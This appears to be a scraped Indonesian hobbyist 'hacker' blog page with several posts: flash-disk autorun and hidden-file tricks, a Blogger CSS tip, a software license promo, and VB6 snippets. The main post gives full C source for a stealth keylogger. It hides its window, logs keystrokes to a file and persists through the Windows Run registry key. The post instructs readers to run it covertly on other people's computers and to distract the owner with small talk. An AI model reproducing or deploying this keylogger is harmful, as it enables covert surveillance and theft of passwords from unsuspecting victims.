If Me.Top < 100 Then Me.Top = Me.Top + 100 Else Me.Top = 1 Timer2.Enabled = False Timer1.Enabled = True Timer1.Interval = 1 End If End Sub Private Function MakeTrans(pngPath As String) As Boolean Dim tempBI As BITMAPINFO Dim tempBlend As BLENDFUNCTION Dim lngHeight As Long, lngWidth As Long Dim curWinLong As Long Dim img As Long Dim graphics As Long Dim winSize As Size Dim srcPoint As POINTAPI With tempBI.bmiHeader .biSize = Len(tempBI.bmiHeader) .biBitCount = 32 .biHeight = Me.ScaleHeight .biWidth = Me.ScaleWidth .biPlanes = 1 .biSizeImage = .biWidth * .biHeight * (.biBitCount / 8) End With mDC = CreateCompatibleDC(Me.hdc) mainBitmap = CreateDIBSection(mDC, tempBI, DIB_RGB_COLORS, ByVal 0, 0, 0) oldBitmap = SelectObject(mDC, mainBitmap) Call GdipCreateFromHDC(mDC, graphics) Call GdipLoadImageFromFile(StrConv(pngPath, vbUnicode), img) Call GdipGetImageHeight(img, lngHeight) Call GdipGetImageWidth(img, lngWidth) Call GdipDrawImageRect(graphics, img, 0, 0, lngWidth, lngHeight) curWinLong = GetWindowLong(Me.hwnd, GWL_EXSTYLE) SetWindowLong Me.hwnd, GWL_EXSTYLE, curWinLong Or WS_EX_LAYERED SetWindowPos Me.hwnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE srcPoint.x = 0 srcPoint.y = 0 winSize.cx = Me.ScaleWidth winSize.cy = Me.ScaleHeight With blendFunc32bpp .AlphaFormat = AC_SRC_ALPHA .BlendFlags = 0 .BlendOp = AC_SRC_OVER .SourceConstantAlpha = 255 End With Call GdipDisposeImage(img) Call GdipDeleteGraphics(graphics) Call UpdateLayeredWindow(Me.hwnd, Me.hdc, ByVal 0&, winSize, mDC, srcPoint, 0, blendFunc32bpp, ULW_ALPHA) End Function


Untuk Keluhan Code

Bisa Tanyakan Kpd Wheldt

 :   dhani.hacker86@gmail.com
 

Cara modifikasi flas-disk lebih menarik (Trik Notepad)

uamm bingung mo nulis apa,.. idea yawdah berhubung ga da kerjaan n ga da ide juga hehe… nich mo tuliz tentang ganti icon, backgroun n aktifin antivirus dalam fdisk.. sebenernya nich udah pernah saya tulis di web blog saya yang dulu… cuman nich review aja oq he…

  1. Buat BackGrouNd dalam Flashdisk
    Langkah – langkah : 1. Siapkan gambar atau foto yang ingin di pakai menjadi background, lalu “rename” nama gambar atau foto itu menjadi “cover” , misalnya fotoku.jpg –> rubah menjadi–>cover.jpg,…caranya pasti semua sudah tau –>klik-kanan–>rename. 2. Copy kode di bwh ini dan paste di Notepad :
    [ExtShellFolderViews]
    {BE098140-A513-11D0-A3A4-00C04FD706EC}=
    {BE098140-A513-11D0-A3A4-00C04FD706EC}
    [{BE098140-A513-11D0-A3A4-00C04FD706EC}]
    Attributes=1
    IconArea_Image=cover.jpg
    IconArea_Text=0xcc00aa
    [.ShellClassInfo]
    ConfirmFileOp=0
    3. Lalu Save As, dengan nama desktop.ini
    4. Copy 2 file tadi (cover.jpg + desktop.ini) ke FlashDisk anda.
    5. Selesai.
    Nb:
    Jika gambarna warnanya hitam pastilah nama file na gk bakalan keliatan… tp janagan BinuN tenang2_________
    ganti aja warna IconArea_Text=0x dgn warna yg lebih terank…
    _______daftar warna2 dasar______
    Red #FF0000
    White #FFFFFF
    Turquoise #00FFFF
    Light Grey #C0C0C0
    Light Blue #0000FF
    Dark Grey #808080
    Dark Blue #0000A0
    Black #000000
    Light Purple #FF0080
    Orange #FF8040
    Dark Purple #800080
    Brown #804000
    Yellow #FFFF00
    Burgundy #800000
    Pastel Green #00FF00
    Forest Green #808000
    Pink #FF00FF
    Grass Green #408080
    “”__”"sample IconArea_Text=0xFFFFFF <— text akan berubah jd putihh… pika19
  2. GanTi IcoN di FlashDisk LaNgkah _LaNGkah Napika21
    Pertama2 baca Bismillah dulu hikss nich sangat pentINg :D 1.cari icon yang keren menurut anda Keren, biasanya icon ber extensi .ico trus copy’in ke flashdisk.. (cari digoogle banyaks oks)
    2.Buka Teks Editor bawaan Windows Alias Notepad
    3.Kemudian ketikan kata-kata sakti dibawah ini :
    [AutoRun]
    icon=”namaicon.ico”
    ket:
    nama icon merupakan nama icon yang kita copy ke flashdisk tadi
    4.Save file ini ke flashdisk dengan cara klik File >> Save As >> trus isi namanya autorun.inf
    5.untuk save as typenya ganti menjadi all files
    6.setelah selesai Liat, tuch icon fdiskna udah berubah belum..?? klo belum kucek2 mata dulu sapa tau td gak jelas hehe.. FDISK di cabut dulu dr kompi terus culekin lagi… insya allah icon yg td anda buat udah nongkrong :-p
    7.ngak bagus y kalo di dalam flashdisk qta keliatan file autorunnya…Nah..Langsung aj ganti attibutnya jadi superhidden..
    8.cara nya buka RUN >> ketik cmd abis ntu masuk ke flashdisk(biasanya drive F) kemudian ketik aja commandnya :
    attrib +s +h autorun.inf
    attrib +s +h namaicon.ico
    9.Sekarang Pemandangan udah sedap dimata n’ ICon Flashdisk nya udah berubahkan…..pika26
  3. Aktifin AntiViruzz di F.disk Mungkin temen-temen semua dah pada tau cara bikin AUTORUN pada flashdisk.. nah disini kita
    akan memanfaatkan cara ntuk membuat autorun tersebut ntuk mengaktifkan anti virus yang
    nantinya akan kita copy pada flashdisk kita.. Alat & bahan : <– kek mo bikin rumah aj da alat + bahan hehe ————– software Anti Viruzz yang berukuran kecil (banyak di internet,,goggling aj..) contoh: PCMAV,ANSAV,SMADAV dll. yg udah gue pake sich PCMAV karena ukuran filena lebih kecil jd gak makan tempat di fdisk.. maklum fdisk gue kan warisan dr baba Hong jd kapasitasnya gak sebesar fdisk jaman skrg.. its ok malah curhat :-p Langkah-langkah: —————- 1.ketik di notepad mantera berikut:
    [AutoRun]
    open=namaantivirus.exe
    shellexecute=namaantivirus.exe
    shell\tendang viruz\command=nmantiviruz.exe
    shell=tendang viruz
    2.trus save dengan nama autorun.inf di flashdisk kita sekarang tinggal kita copy aja antivirus yang mau kita masukin ke flashdisk..!!!
    (NB:kalo ngopy file autorun n’ antivirusnya jangan di dalam folder)
    Dah jadi deh…^_^!!
    kalo mau scan virus tinggal klik kanan drive flashdisknya bakalan ada tambahan kata di atas kata
    AUTOPLAY.
    tendang viruz klik aja
    kalo mau di ubah ya kita tinggal ganti aja kata-kata yang ada di dalam script…!

    shell\isi trsrah anda\command=nmantiviruz.exe
    shell=isi terserah anda
    teruz jgn lupa file td di hidden ben keliatan keren dikit…. :-p
 

Menghilangkan Icon Obeng dan Tang / Quick edit Blogger

Menanggapi pertanyaan dari beberapa blogger… hehehe… Saya serasa jadi konsultan blogger saja ya kalau posting biasanya pake kata-kata tersebut 4 soalnya “ Your Questions is my inspiration” pertanyaan anda adalah inspirasiku. Jadi rahasia kenapa blog ini masih bisa bertahan sampai sekarang adalah karena masih ada yang bertanya ke Om Wheldt. So, tentu saja ide untuk posting selalu ada. Eh..eh.. ko…gitu sich.. la ko  jadi ngelantur nih, kembali ke judul posting ini ah.
Apa sih maksud dari judul posting ini, sepertinya agak aneh? begini nih teman-teman, jika kita sedang mengedit template dan melihat hasilnya maka pada sudut-sudut element akan terlihat icon bergambar obeng dan tang. berikut contoh screenshotnya :

quick-edit

Icon tersebut di sebut juga dengan icon Quick Edit atau dengan kata lain untuk mengedit secara cepat. Fungsinya jika kita ingin melakukan editing terhadap elemen tersebut tinggal klik saja icon nya dan kita bisa langsung mengeditnya. Icon tersebut sebenarnya hanya bisa di lihat apabila kita sedang login ke blogger saja, sedangkan pengunjung yang lain tidak bisa melihat icon tersebut.
Namun ternyata ada beberapa blogger yang tidak suka dengan kehadiran icon tersebut dan ingin menghapusnya. Apakah kita bisa  menghapus icon tersebut? Jawabannya tentu saja bisa, dan sangatlah gampang karena kita hanya melakukan perintah agar icon itu tidak di munculkan dengan hanya manambahkan sedikit kode pada kode CSS template kita. Ingin tahu kodenya seperti apa, nih ini dia kodenya, coba pasang saja di Style Sheet CSS anda :

.quickedit{
display:none;
}

Mudah sekali bukan? atau masih bingung. Ok deh, ini dia cara lengkapnya :

  1. Login ke blogger dengan ID anda tentunya.
  2. Klik  Tata Letak.
  3. Klik tab Edit HTML.
  4. Cari kode seperti ini :
    ]]></b:skin>

  5. Copy paste kode berikut persis di atas kode yang tadi :

    .quickedit{
    display:none;
    }

  6. Klik tombol Simpan template.
  7. Selesai.


Selain langkah di atas, sebenarnya masih ada yang harus anda lakukan yaitu silahkan ucapkan “ Selamat tinggal Obeng dan Tang…dadaaahhhhh “ hehehe….

Selamat mencoba!
 

Download Speedupmypc 2011 With Serial License Key

Download Speedupmypc 2011 With Serial License Key
Posting Ini Hasil C&P Dari SumberNya,
Jadi Kalian Bisa Translate Lewat Wheldt Translate Yang Sudah Tersedia





If you missed the last Speedupmypc 2011 promotional offer which is still valid for speedupmypc 2010 version. Then here is another opportunity for you to grab this 1 year license key of speedupmypc 2011. The actual cost of the software is $39.95 .This offer is valid till 1st june so grab it before its too late.
Speedupmypc 2011 is Gold Certified from Microsoft.It will boost your computer speed by optimizing processes,registry,settings and cleaning your computer of unnecessary and junk files.
To grab the 1 year license key for free follow the step below
1.       Click Here to go to promotional page
Uniblue SpeedUpMyPC 2011 PC Advisor Promo 300x226 Download Speedupmypc 2011 With Serial License Key

2.       Now Click on the Get your Free product Button
Uniblue SpeedUpMyPC 2011 Registration 300x223 Download Speedupmypc 2011 With Serial License Key
3.       Enter all the details and the click on Complete Registration button
speedupmypc Download Speedupmypc 2011 With Serial License Key
4.       Now you will get your download link for the software and its license key.These details will also be emailed to for future use.
How To Activate Speedupmypc 2011 with Serial key
1.       Install the software that you have already downloaded from the promotional page
2.       Open the software and Click on the Register Now button of the bottom left of the window
3.       Copy the serial key that you got from the promotional page
Speedupmypc is compatible with all versions of windows including windows 7


Semoga Bermanfaat
 

Cara Mengganti Nama File Dan Folder Dengan Visual Basic 6.0


      Bagi anda yang sering menggunakan bahasa pemrograman khususnya bahasa pemrograma Visual Basic 6.00 Professional Edition, kali ini saya ingin share code untuk mengganti nama file dan folder. Dari beberapa sample virus yang saya dapatkan, cara mengganti nama file dan folder sepertinya terlalu panjang hingga menggunakan API, padahal Visual Basic sendiri dapat melakukan itu hanya dengan beberapa baris code seperti berikut.
Untuk merename file dapat menggunakan contoh code berikut :
  • Private Sub RenameFile_Click()
  • Name "C:\nalhacker.txt" As "C:\nalhacker changed.txt"
  • End Sub
Untuk merename folder dapat menggunakan contoh code berikut :
  • Private Sub RenameFolder_Click()
  • Name "C:\nalhacker" As "C:\nalhacker changed"
  • End Sub
Keterangan Contoh !
Pada Baris Fungsi Rename File
  • Nalhacker.txt = Merupakan contoh sebuah file text yang berada di direktori C:/ di komputer saya. Silahkan ganti dengan nama file lain yang anda gunakan.
Pada Baris Fungsi Rename Folder
  • Nalhacker = Merupakan contoh sebuah folder text yang berada di direktori C:/ di komputer saya. Silahkan ganti dengan nama folder lain yang anda gunakan.
Nah, cara diatas tentunya lebih singkat dan mudah bukan tanpa perlu menggunakan API. Bukan hanya itu, cara ini juga dapat menghemat ukuran aplikasi yang akan kita kompilasi baik ke P-Code ataupun Native Code. Untuk contoh, anda dapat mendownload sample code melalui link berikut ini. Semoga bermanfaat bagi anda.
Link Download Sample Code Rename File Or Folder
 

Cara Membuat Flash disk anda menjadi Hardware Keylogger

Ini dia tutornya : Grin

• Pertama agan harus menyediakan flash disk ato USB agan masing-masing (yang g jorok atau bebas virus ya, biar kompu orang g rusak).

• Lalu agan mesti download C++. Bias agan download di http://www.brothersoft.com/dev-c++-65296.html.

• Setelah anda donlod C++, anda buka dan install

• Setelah di install, open dan tulis code ini :

#include <windows.h>
#include <stdio.h>
#include <winuser.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    int test,create;
    test=test_key();/*check if key is available for opening*/
      
    if (test==2)/*create key*/
    {
        char *path="c:\\%windir%\\Log.exe";/*the path in which the file needs to be*/
        create=create_key(path);
        
    }
      

    int t=get_keys();
  
    return t;
}

int get_keys(void)
{
            short character;
              while(1)
{
                  
    for(character=8;character<=222;character++)
{
    if(GetAsyncKeyState(character)==-32767)
{
                          
     FILE *file;
    file=fopen("log.log","a+");
if(file==NULL)
{
return 1;
}          
if(file!=NULL)
{      
if((character>=39)&&(character<=64))
{
    fputc(character,file);
    fclose(file);
    break;
}      
    else if((character>64)&&(character<91))
{
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
}
    else
{
    switch(character)
{
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;  
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                          
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;  
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                              
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               /*case VK_OEM_PLUS:
                                               fputc('+',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_COMMA:
                                               fputc(',',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_MINUS:
                                               fputc('-',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_PERIOD:
                                               fputc('.',file);
                                               fclose(file);
                                               break;*/
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }      
                                   }  
                              }      
                    }  
                }                
                  
            }
            return EXIT_SUCCESS;                          
}                                              

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
  
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {  
        check=1;
        return check;
    }      
        
    reg_key=RegQueryValueEx(hKey,"Log",NULL,NULL,(LPBYTE)path,&buf_length);
  
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
      
    RegCloseKey(hKey);
    return check;
}

int create_key(char *path)
{
        int reg_key,check;
      
        HKEY hkey;
      
        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"Log",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;
              
        return check;
}



• Nah, setelah itu agan Complie atau run, tapi enakan klik Rebuild All, bias agan temukan di Execute>Rebuild All


• Nah berhubung program sudah jalan, wajib agan end process “Log.exe “nya di Windows Task Manager.Save program dengan nama “Log”.


• Sekarang, coba agan buka my document, pasti dah ada program nya “Log.exe” dan tempat hasil Log-an nya yang bernama “Log”


• Tetapi apabila anda ingin mengganti nama program nya menjadi nama yang anda ingin kan seperti contoh “Bagas”, bias anda ubah code nya di sini

Kode:
1.char *path="c:\\%windir%\\Bagas.exe";/*the path in which the file needs to be*/

2.file=fopen("Bagas.log","a+");

3.reg_key=RegQueryValueEx(hKey,"Bagas",NULL,NULL,(LPBYTE)path,&buf_length);

4.    RegSetValueEx((HKEY)hkey,"Bagas",0,REG_SZ,(BYTE *)path,strlen(path));



• Na, kan sudah menjadi folder, tinggal agan copy ke flash disk


• Selanjutnya, tinggal agan jalanin aja di kompu orang lain lewat flash disk agan, untuk menghentikan “Log.exe’ / Keylogger nya, bisa kalian end process di Windows Task Manager / ctrl+alt+delete

• Tetapi kalau yang punya kompu Tanya “ko flash disk nya g d lepas?”, na tinggal basa-basi da ama yang punya computer,, hehehehhehehehe
Semoga Bermanfaat
 
U Have Website We have Cash
If you have website put our banner on it, make money for each visitor
homezwork.com

Instructions

Wheldthacker. Diberdayakan oleh Blogger.

Translate

Music